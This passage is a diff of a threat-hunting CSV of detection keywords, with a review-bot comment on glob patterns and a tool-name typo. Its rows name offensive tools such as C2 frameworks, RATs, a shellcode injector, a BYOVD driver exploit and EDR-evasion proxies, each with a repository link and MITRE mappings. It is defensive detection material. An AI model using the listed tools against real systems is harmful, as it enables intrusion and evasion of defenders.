T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Reaper.git*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*/Reaper/Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*/ReaperX64.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*/REC2.git*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*/recon-archy.git*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*/RecycledInjector*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*/RecycledInjector.git*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*/RedGuard.git*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*/RedGuard.go*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - 
Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/Reaper.git*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/Reaper/Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/ReaperX64.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/REC2.git*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*/recon-archy.git*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*/RecycledInjector*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/RecycledInjector.git*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/RedGuard.git*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard.go*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - 
APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/redirector/redirector.py*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
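Review bot: The re-added rows for `"*/RedGuard_32"` and `"*/RedGuard_64"` still have no trailing `*`, unlike the sibling `"*/RedGuard.git*"` and `"*/RedGuard.go*"` rows in this hunk. If the consuming rule engine treats `*` as a glob, these two keywords only match strings that end exactly in `RedGuard_32` or `RedGuard_64`. A download URL with an extension or a command line with arguments would then be missed, even though both rows have the endpoint and proxy detection columns set to `1`. I would write them as `"*/RedGuard_32*"` and `"*/RedGuard_64*"`. The `"*/REC2.git*"` row also keeps `"REC2 "` with a trailing space in `metadata_tool`, which will break exact-match grouping or filtering by tool name; `"REC2"` looks like the intent.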
@@ -4958,13 +5008,13 @@ "*/RedPeanut.html*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutAgent/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutRP/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*/RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*/RedPersist.git*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/RedPersist.git*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*/redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*/redsocks-fw.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*/RedTeam_toolkit*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" "*/red-team-scripts*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"*/RedWarden.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/RedWarden.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*/ReferenceSourceLibraries/Sharpire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 
